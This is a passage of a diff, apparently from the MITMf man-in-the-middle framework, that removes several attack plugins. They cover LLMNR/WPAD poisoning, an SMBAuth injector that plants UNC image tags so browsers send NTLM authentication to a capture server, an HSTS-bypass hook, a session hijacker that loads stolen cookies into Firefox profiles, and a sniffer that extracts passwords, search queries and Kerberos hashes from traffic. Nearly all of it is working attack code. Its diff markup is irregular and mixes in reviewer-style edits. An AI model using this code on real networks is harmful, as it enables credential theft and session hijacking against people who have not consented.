        return mime.find(self.mime) != -1

    def _get_req_info(self, request):
        """Extract (client IP, request hostname, response Content-Type)."""
        ip = request.client.getClientIP()
        hn = request.client.getRequestHostname()
        mime = request.client.headers['Content-Type']

        return (ip, hn, mime)
|
|
@ -23,9 +23,10 @@ import os
|
|||
import threading
|
||||
|
||||
from plugins.plugin import Plugin
|
||||
from libs.responder.Responder import ResponderMITMf
|
||||
from core.sslstrip.DnsCache import DnsCache
|
||||
from twisted.internet import reactor
|
||||
from core.responder.wpad.WPADPoisoner import WPADPoisoner
|
||||
from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner
|
||||
from core.utils import SystemConfig
|
||||
|
||||
class Responder(Plugin):
|
||||
name = "Responder"
|
||||
|
@ -37,37 +38,32 @@ class Responder(Plugin):
|
|||
|
||||
def initialize(self, options):
|
||||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
self.options = options
|
||||
self.interface = options.interface
|
||||
self.ourip = SystemConfig.getIP(options.interface)
|
||||
|
||||
try:
|
||||
config = options.configfile['Responder']
|
||||
config = self.config['Responder']
|
||||
except Exception, e:
|
||||
sys.exit('[-] Error parsing config for Responder: ' + str(e))
|
||||
|
||||
if options.Analyze:
|
||||
LLMNRPoisoner().start(options, self.ourip)
|
||||
|
||||
if options.wpad:
|
||||
WPADPoisoner().start()
|
||||
|
||||
if options.analyze:
|
||||
self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned")
|
||||
|
||||
resp = ResponderMITMf()
|
||||
resp.setCoreVars(options, config)
|
||||
|
||||
result = resp.AnalyzeICMPRedirect()
|
||||
if result:
|
||||
for line in result:
|
||||
self.tree_output.append(line)
|
||||
|
||||
resp.printDebugInfo()
|
||||
resp.start()
|
||||
|
||||
def pluginReactor(self, strippingFactory):
    '''Framework hook: register the SSL-stripping factory on TCP/3141.

    Merge residue removed: SOURCE contained both a `plugin_reactor` and a
    `pluginReactor` definition of this method; the newer camelCase name is
    kept — NOTE(review): confirm against the framework's caller.
    '''
    reactor.listenTCP(3141, strippingFactory)
|
||||
|
||||
def add_options(self, options):
    '''Register Responder's command-line flags on the *options* parser.

    Merge residue removed: each flag appeared twice with conflicting dest
    names (e.g. "Analyze" vs "analyze"); argparse raises on duplicate
    option strings, so only the newer lowercase-dest set is kept.
    '''
    options.add_argument('--analyze', dest="analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning")
    options.add_argument('--basic', dest="basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
    options.add_argument('--wredir', dest="wredir", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False")
    options.add_argument('--nbtns', dest="nbtns", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False")
    options.add_argument('--fingerprint', dest="finger", default=False, action="store_true", help="This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query")
    options.add_argument('--wpad', dest="wpad", default=False, action="store_true", help="Set this to start the WPAD rogue proxy server. Default value is False")
    options.add_argument('--forcewpadauth', dest="forceWpadAuth", default=False, action="store_true", help="Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
    options.add_argument('--lm', dest="lm", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False")
|
||||
|
|
|
@ -1,49 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.Inject import Inject
|
||||
import sys
|
||||
import logging
|
||||
|
||||
class SMBAuth(Inject, Plugin):
    '''Injects IMG tags whose sources point at UNC/SMB paths, coaxing
    Windows clients into SMB challenge-response auth attempts against
    our capture server.'''

    name     = "SMBAuth"
    optname  = "smbauth"
    desc     = "Evoke SMB challenge-response auth attempts"
    depends  = ["Inject"]
    version  = "0.1"
    has_opts = True

    def initialize(self, options):
        '''Resolve the capture host and build the HTML payload to inject.'''
        Inject.initialize(self, options)
        # fall back to our interface IP when --host was not supplied
        self.target_ip = options.host or options.ip_address
        self.html_payload = self._get_data()

    def add_options(self, options):
        options.add_argument("--host", type=str, default=None, help="The ip address of your capture server [default: interface IP]")

    def _get_data(self):
        '''Return three IMG tags, each a different trick to trigger an
        outbound SMB connection (plain UNC, file:// UNC, moz-icon).'''
        tags = ('<img src="\\\\%s\\image.jpg">'
                '<img src="file://///%s\\image.jpg">'
                '<img src="moz-icon:file:///%%5c/%s\\image.jpg">')
        return tags % ((self.target_ip,) * 3)
|
|
@ -1,56 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import sys
|
||||
import logging
|
||||
|
||||
from plugins.plugin import Plugin
|
||||
from core.utils import IpTables
|
||||
from core.sslstrip.URLMonitor import URLMonitor
|
||||
from core.dnschef.dnschef import DNSChef
|
||||
|
||||
class HSTSbypass(Plugin):
    '''Enables Leonardo Nve's partial HSTS bypass (SSLstrip+) by feeding
    the configured host map to the URL monitor and the DNS server.'''

    name        = 'SSLstrip+'
    optname     = 'hsts'
    desc        = 'Enables SSLstrip+ for partial HSTS bypass'
    version     = "0.4"
    tree_output = ["SSLstrip+ by Leonardo Nve running"]
    has_opts    = False

    def initialize(self, options):
        '''Load the SSLstrip+ config section and wire it into the
        URLMonitor and DNSChef singletons.'''
        self.options = options
        self.manualiptables = options.manualiptables

        try:
            hstsconfig = options.configfile['SSLstrip+']
        except Exception as e:
            sys.exit("[-] Error parsing config for SSLstrip+: " + str(e))

        # set up the DNS redirect unless the user manages iptables himself
        if not options.manualiptables and IpTables.getInstance().dns is False:
            IpTables.getInstance().DNS(options.ip_address, options.configfile['MITMf']['DNS']['port'])

        URLMonitor.getInstance().setHstsBypass(hstsconfig)
        DNSChef.getInstance().setHstsBypass(hstsconfig)

    def finish(self):
        '''Tear down the DNS iptables redirect if we created one.'''
        if not self.manualiptables and IpTables.getInstance().dns is True:
            IpTables.getInstance().Flush()
|
|
@ -1,187 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
#Almost all of the Firefox related code was stolen from Firelamb https://github.com/sensepost/mana/tree/master/firelamb
|
||||
|
||||
from plugins.plugin import Plugin
|
||||
from core.publicsuffix.publicsuffix import PublicSuffixList
|
||||
from urlparse import urlparse
|
||||
import threading
|
||||
import os
|
||||
import sys
|
||||
import time
|
||||
import logging
|
||||
import sqlite3
|
||||
import json
|
||||
import socket
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class SessionHijacker(Plugin):
    '''Performs session hijacking attacks against clients.

    Sniffed cookies are either written into a per-client Firefox
    cookies.sqlite profile (--firefox) or served over a local TCP port
    to the Mallory cookie-injector browser extension (--mallory).
    '''

    name       = "Session Hijacker"
    optname    = "hijack"
    desc       = "Performs session hijacking attacks against clients"
    implements = ["cleanHeaders"]
    version    = "0.1"
    has_opts   = True

    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options  = options
        self.psl      = PublicSuffixList()
        self.firefox  = options.firefox
        self.mallory  = options.mallory
        self.save_dir = "./logs"
        self.seen_hosts = {}  # {client_ip: {hostname: 1}} hosts already written to visited.html
        self.sql_conns  = {}  # {client_ip: sqlite3 cursor} one cookie DB per client
        self.sessions   = []  # [(host, cookie)] queue for the Mallory extension
        self.html_header="<h2>Cookies sniffed for the following domains\n<hr>\n<br>"

        #Recent versions of Firefox use "PRAGMA journal_mode=WAL" which requires
        #SQLite version 3.7.0 or later. You won't be able to read the database files
        #with SQLite version 3.6.23.1 or earlier. You'll get the "file is encrypted
        #or is not a database" message.

        sqlv = sqlite3.sqlite_version.split('.')
        # BUG FIX: the split() fields are strings; the old `sqlv[0] < 3` test
        # compared str to int (always False in Python 2) so the guard never
        # fired, and `sqlv[1] < 7` alone would misclassify e.g. 4.0
        if tuple(int(x) for x in sqlv[:2]) < (3, 7):
            sys.exit("[-] sqlite3 version 3.7 or greater required")

        if not os.path.exists("./logs"):
            os.makedirs("./logs")

        if self.mallory:
            # background server the browser extension polls for cookies
            t = threading.Thread(name='mallory_server', target=self.mallory_server, args=())
            t.setDaemon(True)
            t.start()

    def cleanHeaders(self, request): # Client => Server
        '''Proxy hook: harvest Cookie headers from client requests.'''
        headers = request.getAllHeaders().copy()
        client_ip = request.getClientIP()

        if 'cookie' in headers:

            if self.firefox:
                url = "http://" + headers['host'] + request.getPathFromUri()
                for cookie in headers['cookie'].split(';'):
                    eq     = cookie.find("=")
                    cname  = str(cookie)[0:eq].strip()
                    cvalue = str(cookie)[eq+1:].strip()
                    self.firefoxdb(headers['host'], cname, cvalue, url, client_ip)

                mitmf_logger.info("%s << Inserted cookie into firefox db" % client_ip)

            if self.mallory:
                # queue at most one cookie per host for the extension
                known_hosts = [session[0] for session in self.sessions]
                if headers['host'] not in known_hosts:
                    self.sessions.append((headers['host'], headers['cookie']))
                    mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie']))
                    mitmf_logger.info("%s Sent cookie to browser extension" % client_ip)

    def mallory_server(self):
        '''Tiny localhost-only HTTP endpoint serving queued sessions as JSON.'''
        host = ''
        port = 20666
        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((host, port))
        server.listen(1)
        while True:
            client, addr = server.accept()
            # refuse anything that is not the local browser extension
            if addr[0] != "127.0.0.1":
                client.send("Hacked By China!")
                client.close()
                continue
            request = client.recv(8192)
            request = request.split('\n')
            path = request[0].split()[1]
            client.send("HTTP/1.0 200 OK\r\n")
            client.send("Content-Type: text/html\r\n\r\n")
            if path == "/":
                client.send(json.dumps(self.sessions))
            client.close()

    def firefoxdb(self, host, cookie_name, cookie_value, url, ip):
        '''Insert a captured cookie into a per-client Firefox cookies.sqlite
        DB and append the visited URL to that client's visited.html log.'''

        session_dir = self.save_dir + "/" + ip
        cookie_file = session_dir + '/cookies.sqlite'
        cookie_file_exists = os.path.exists(cookie_file)

        # BUG FIX: the old test `ip not in (self.sql_conns and os.listdir("./logs"))`
        # could skip creating a cursor when the client's log dir already existed,
        # then KeyError on self.sql_conns[ip] below; only a missing cursor matters
        if ip not in self.sql_conns:

            try:
                if not os.path.exists(session_dir):
                    os.makedirs(session_dir)

                db = sqlite3.connect(cookie_file, isolation_level=None)
                self.sql_conns[ip] = db.cursor()

                if not cookie_file_exists:
                    self.sql_conns[ip].execute("CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path))")
                    self.sql_conns[ip].execute("CREATE INDEX moz_basedomain ON moz_cookies (baseDomain)")
            except Exception as e:
                print(str(e))

        # duplicate `scheme = ...` assignment (merge residue) removed
        scheme     = urlparse(url).scheme
        basedomain = self.psl.get_public_suffix(host)
        address    = urlparse(url).hostname
        short_url  = scheme + "://" + address

        log = open(session_dir + '/visited.html', 'a')
        if ip not in self.seen_hosts:
            self.seen_hosts[ip] = {}
            log.write(self.html_header)

        if address not in self.seen_hosts[ip]:
            self.seen_hosts[ip][address] = 1
            log.write("\n<br>\n<a href='%s'>%s</a>" % (short_url, address))

        log.close()

        if address == basedomain:
            address = "." + address

        expire_date = 2000000000  # Year 2033
        now = int(time.time()) - 600
        self.sql_conns[ip].execute('INSERT OR IGNORE INTO moz_cookies (baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly) VALUES (?,?,?,?,?,?,?,?,?,?)', (basedomain,cookie_name,cookie_value,address,'/',expire_date,now,now,0,0))

    def add_options(self, options):
        options.add_argument('--firefox', dest='firefox', action='store_true', default=False, help='Create a firefox profile with captured cookies')
        options.add_argument('--mallory', dest='mallory', action='store_true', default=False, help='Send cookies to the Mallory cookie injector browser extension')

    def finish(self):
        if self.firefox:
            print("\n[*] To load a session run: 'firefox -profile <client-ip> logs/<client-ip>/visited.html'")
|
|
@ -1,815 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
#This is a MITMf port of net-creds https://github.com/DanMcInerney/net-creds
|
||||
|
||||
from plugins.plugin import Plugin
|
||||
import logging
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
|
||||
from scapy.all import *
|
||||
from sys import exit
|
||||
from collections import OrderedDict
|
||||
from StringIO import StringIO
|
||||
import binascii
|
||||
import struct
|
||||
import pcap
|
||||
import base64
|
||||
import threading
|
||||
import re
|
||||
import os
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class Sniffer(Plugin):
    '''Passive credential sniffer (MITMf port of net-creds).

    Spawns a daemon thread running the NetCreds scapy sniffer on the
    chosen interface, and additionally inspects proxied HTTP requests
    for search-engine queries and credentials passed in URLs.
    '''

    name        = "Sniffer"
    optname     = "sniffer"
    desc        = "Sniffs for various protocol login and auth attempts"
    tree_output = ["Net-Creds online"]
    implements  = ["sendRequest"]
    version     = "0.1"
    has_opts    = False

    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options   = options
        self.interface = options.interface

        #these field names were stolen from the etter.fields file (Ettercap Project)
        self.http_userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
                                'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
                                'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
                                'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
                                'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']

        # BUG FIX: a missing comma after 'login_password' used to merge it with
        # 'passwort' into the bogus field name 'login_passwordpasswort'; the
        # duplicate 'login_password' entry is also dropped
        self.http_passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
                                'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword',
                                'passwort', 'passwrd', 'wppassword', 'upasswd']

        # raw sniffing needs a raw socket
        if os.geteuid() != 0:
            sys.exit("[-] Sniffer plugin requires root privileges")

        n = NetCreds()
        t = threading.Thread(name="sniffer", target=n.start, args=(self.interface,))
        t.setDaemon(True)
        t.start()

    def sendRequest(self, request):
        '''Proxy hook: mine proxied requests for search queries and URL creds.'''
        #Capture google searches
        if ('google' in request.headers['host']):
            if ('search' in request.uri):
                self.captureQueries('q', request)

        #Capture bing searches
        if ('bing' in request.headers['host']):
            if ('Suggestions' in request.uri):
                self.captureQueries('qry', request)

        #Capture yahoo searches
        if ('search.yahoo' in request.headers['host']):
            if ('nresults' in request.uri):
                self.captureQueries('command', request)

        self.captureURLCreds(request)

    def captureQueries(self, search_param, request):
        '''Log the value of *search_param* from the request's query string.'''
        try:
            for param in request.uri.split('&'):
                if param.split('=')[0] == search_param:
                    query = str(param.split('=')[1])
                    if query:
                        mitmf_logger.info(request.clientInfo + "is querying %s for: %s" % (request.headers['host'], query))
        except Exception as e:
            error = str(e)
            mitmf_logger.warning(request.clientInfo + "Error parsing search query %s" % error)

    def captureURLCreds(self, request):
        '''
        checks for creds passed via GET requests or just in the url
        It's surprising to see how many people still do this (please stahp)
        '''

        url = request.uri

        username = None
        password = None
        for user in self.http_userfields:
            search = re.search('(%s=[^&]+)' % user, url, re.IGNORECASE)
            if search:
                username = search.group()

        for passw in self.http_passfields:
            search = re.search('(%s=[^&]+)' % passw, url, re.IGNORECASE)
            if search:
                password = search.group()

        # only flag the URL when both a user and a password field matched
        if (username and password):
            mitmf_logger.warning(request.clientInfo + "Possible Credentials (Method: %s, Host: %s):\n%s" % (request.command, request.headers['host'], url))
|
||||
|
||||
class NetCreds:
|
||||
|
||||
def __init__(self):
|
||||
self.pkt_frag_loads = OrderedDict()
|
||||
self.challenge_acks = OrderedDict()
|
||||
self.mail_auths = OrderedDict()
|
||||
self.telnet_stream = OrderedDict()
|
||||
|
||||
# Regexs
|
||||
self.authenticate_re = '(www-|proxy-)?authenticate'
|
||||
self.authorization_re = '(www-|proxy-)?authorization'
|
||||
self.ftp_user_re = r'USER (.+)\r\n'
|
||||
self.ftp_pw_re = r'PASS (.+)\r\n'
|
||||
self.irc_user_re = r'NICK (.+?)((\r)?\n|\s)'
|
||||
self.irc_pw_re = r'NS IDENTIFY (.+)'
|
||||
self.mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)'
|
||||
self.mail_auth_re1 = '(\d+ )?login '
|
||||
self.NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+'
|
||||
self.NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
|
||||
|
||||
def start(self, interface):
|
||||
try:
|
||||
sniff(iface=interface, prn=self.pkt_parser, store=0)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
def frag_remover(self, ack, load):
|
||||
'''
|
||||
Keep the FILO OrderedDict of frag loads from getting too large
|
||||
3 points of limit:
|
||||
Number of ip_ports < 50
|
||||
Number of acks per ip:port < 25
|
||||
Number of chars in load < 5000
|
||||
'''
|
||||
|
||||
# Keep the number of IP:port mappings below 50
|
||||
# last=False pops the oldest item rather than the latest
|
||||
while len(self.pkt_frag_loads) > 50:
|
||||
self.pkt_frag_loads.popitem(last=False)
|
||||
|
||||
# Loop through a deep copy dict but modify the original dict
|
||||
copy_pkt_frag_loads = copy.deepcopy(self.pkt_frag_loads)
|
||||
for ip_port in copy_pkt_frag_loads:
|
||||
if len(copy_pkt_frag_loads[ip_port]) > 0:
|
||||
# Keep 25 ack:load's per ip:port
|
||||
while len(copy_pkt_frag_loads[ip_port]) > 25:
|
||||
self.pkt_frag_loads[ip_port].popitem(last=False)
|
||||
|
||||
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
|
||||
copy_pkt_frag_loads = copy.deepcopy(self.pkt_frag_loads)
|
||||
for ip_port in copy_pkt_frag_loads:
|
||||
# Keep the load less than 75,000 chars
|
||||
for ack in copy_pkt_frag_loads[ip_port]:
|
||||
# If load > 5000 chars, just keep the last 200 chars
|
||||
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
|
||||
self.pkt_frag_loads[ip_port][ack] = self.pkt_frag_loads[ip_port][ack][-200:]
|
||||
|
||||
def frag_joiner(self, ack, src_ip_port, load):
|
||||
'''
|
||||
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
|
||||
'''
|
||||
for ip_port in self.pkt_frag_loads:
|
||||
if src_ip_port == ip_port:
|
||||
if ack in self.pkt_frag_loads[src_ip_port]:
|
||||
# Make pkt_frag_loads[src_ip_port][ack] = full load
|
||||
old_load = self.pkt_frag_loads[src_ip_port][ack]
|
||||
concat_load = old_load + load
|
||||
return OrderedDict([(ack, concat_load)])
|
||||
|
||||
return OrderedDict([(ack, load)])
|
||||
|
||||
def pkt_parser(self, pkt):
|
||||
'''
|
||||
Start parsing packets here
|
||||
'''
|
||||
|
||||
if pkt.haslayer(Raw):
|
||||
load = pkt[Raw].load
|
||||
|
||||
# Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control
|
||||
if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6):
|
||||
return
|
||||
|
||||
# UDP
|
||||
if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw):
|
||||
|
||||
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport)
|
||||
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport)
|
||||
|
||||
# SNMP community strings
|
||||
if pkt.haslayer(SNMP):
|
||||
self.parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP])
|
||||
return
|
||||
|
||||
# Kerberos over UDP
|
||||
decoded = self.Decode_Ip_Packet(str(pkt)[14:])
|
||||
kerb_hash = self.ParseMSKerbv5UDP(decoded['data'][8:])
|
||||
if kerb_hash:
|
||||
self.printer(src_ip_port, dst_ip_port, kerb_hash)
|
||||
|
||||
# TCP
|
||||
elif pkt.haslayer(TCP) and pkt.haslayer(Raw):
|
||||
|
||||
ack = str(pkt[TCP].ack)
|
||||
seq = str(pkt[TCP].seq)
|
||||
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport)
|
||||
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport)
|
||||
self.frag_remover(ack, load)
|
||||
self.pkt_frag_loads[src_ip_port] = self.frag_joiner(ack, src_ip_port, load)
|
||||
full_load = self.pkt_frag_loads[src_ip_port][ack]
|
||||
|
||||
# Limit the packets we regex to increase efficiency
|
||||
# 750 is a bit arbitrary but some SMTP auth success pkts
|
||||
# are 500+ characters
|
||||
if 0 < len(full_load) < 750:
|
||||
|
||||
# FTP
|
||||
ftp_creds = self.parse_ftp(full_load, dst_ip_port)
|
||||
if len(ftp_creds) > 0:
|
||||
for msg in ftp_creds:
|
||||
self.printer(src_ip_port, dst_ip_port, msg)
|
||||
return
|
||||
|
||||
# Mail
|
||||
mail_creds_found = self.mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq)
|
||||
|
||||
# IRC
|
||||
irc_creds = self.irc_logins(full_load)
|
||||
if irc_creds != None:
|
||||
self.printer(src_ip_port, dst_ip_port, irc_creds)
|
||||
return
|
||||
|
||||
# Telnet
|
||||
self.telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
|
||||
#if telnet_creds != None:
|
||||
# printer(src_ip_port, dst_ip_port, telnet_creds)
|
||||
# return
|
||||
|
||||
# HTTP and other protocols that run on TCP + a raw load
|
||||
self.other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt)
|
||||
|
||||
def telnet_logins(self, src_ip_port, dst_ip_port, load, ack, seq):
|
||||
'''
|
||||
Catch telnet logins and passwords
|
||||
'''
|
||||
|
||||
msg = None
|
||||
|
||||
if src_ip_port in self.telnet_stream:
|
||||
# Do a utf decode in case the client sends telnet options before their username
|
||||
# No one would care to see that
|
||||
try:
|
||||
self.telnet_stream[src_ip_port] += load.decode('utf8')
|
||||
except UnicodeDecodeError:
|
||||
pass
|
||||
|
||||
# \r or \r\n terminate commands in telnet if my pcaps are to be believed
|
||||
if '\r' in self.telnet_stream[src_ip_port] or '\r\n' in self.telnet_stream[src_ip_port]:
|
||||
telnet_split = self.telnet_stream[src_ip_port].split(' ', 1)
|
||||
cred_type = telnet_split[0]
|
||||
value = telnet_split[1].replace('\r\n', '').replace('\r', '')
|
||||
# Create msg, the return variable
|
||||
msg = 'Telnet %s: %s' % (cred_type, value)
|
||||
del self.telnet_stream[src_ip_port]
|
||||
self.printer(src_ip_port, dst_ip_port, msg)
|
||||
|
||||
# This part relies on the telnet packet ending in
|
||||
# "login:", "password:", or "username:" and being <750 chars
|
||||
# Haven't seen any false+ but this is pretty general
|
||||
# might catch some eventually
|
||||
# maybe use dissector.py telnet lib?
|
||||
if len(self.telnet_stream) > 100:
|
||||
self.telnet_stream.popitem(last=False)
|
||||
mod_load = load.lower().strip()
|
||||
if mod_load.endswith('username:') or mod_load.endswith('login:'):
|
||||
self.telnet_stream[dst_ip_port] = 'username '
|
||||
elif mod_load.endswith('password:'):
|
||||
self.telnet_stream[dst_ip_port] = 'password '
|
||||
|
||||
def ParseMSKerbv5TCP(self, Data):
|
||||
'''
|
||||
Taken from Pcredz because I didn't want to spend the time doing this myself
|
||||
I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel?
|
||||
Maybe replace this eventually with the kerberos python lib
|
||||
Parses Kerberosv5 hashes from packets
|
||||
'''
|
||||
try:
|
||||
MsgType = Data[21:22]
|
||||
EncType = Data[43:44]
|
||||
MessageType = Data[32:33]
|
||||
except IndexError:
|
||||
return
|
||||
|
||||
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
|
||||
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
|
||||
HashLen = struct.unpack('<b',Data[50:51])[0]
|
||||
if HashLen == 54:
|
||||
Hash = Data[53:105]
|
||||
SwitchHash = Hash[16:]+Hash[0:16]
|
||||
NameLen = struct.unpack('<b',Data[153:154])[0]
|
||||
Name = Data[154:154+NameLen]
|
||||
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
|
||||
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
|
||||
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||
return 'MS Kerberos: %s' % BuildHash
|
||||
|
||||
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
|
||||
HashLen = struct.unpack('<b',Data[47:48])[0]
|
||||
Hash = Data[48:48+HashLen]
|
||||
SwitchHash = Hash[16:]+Hash[0:16]
|
||||
NameLen = struct.unpack('<b',Data[HashLen+96:HashLen+96+1])[0]
|
||||
Name = Data[HashLen+97:HashLen+97+NameLen]
|
||||
DomainLen = struct.unpack('<b',Data[HashLen+97+NameLen+3:HashLen+97+NameLen+4])[0]
|
||||
Domain = Data[HashLen+97+NameLen+4:HashLen+97+NameLen+4+DomainLen]
|
||||
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||
return 'MS Kerberos: %s' % BuildHash
|
||||
|
||||
else:
|
||||
Hash = Data[48:100]
|
||||
SwitchHash = Hash[16:]+Hash[0:16]
|
||||
NameLen = struct.unpack('<b',Data[148:149])[0]
|
||||
Name = Data[149:149+NameLen]
|
||||
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
|
||||
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
|
||||
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||
return 'MS Kerberos: %s' % BuildHash
|
||||
|
||||
def ParseMSKerbv5UDP(self, Data):
|
||||
'''
|
||||
Taken from Pcredz because I didn't want to spend the time doing this myself
|
||||
I should probably figure this out on my own but hey, time isn't free why reinvent the wheel?
|
||||
Maybe replace this eventually with the kerberos python lib
|
||||
Parses Kerberosv5 hashes from packets
|
||||
'''
|
||||
try:
|
||||
MsgType = Data[17:18]
|
||||
EncType = Data[39:40]
|
||||
except IndexError:
|
||||
return
|
||||
|
||||
if MsgType == "\x0a" and EncType == "\x17":
|
||||
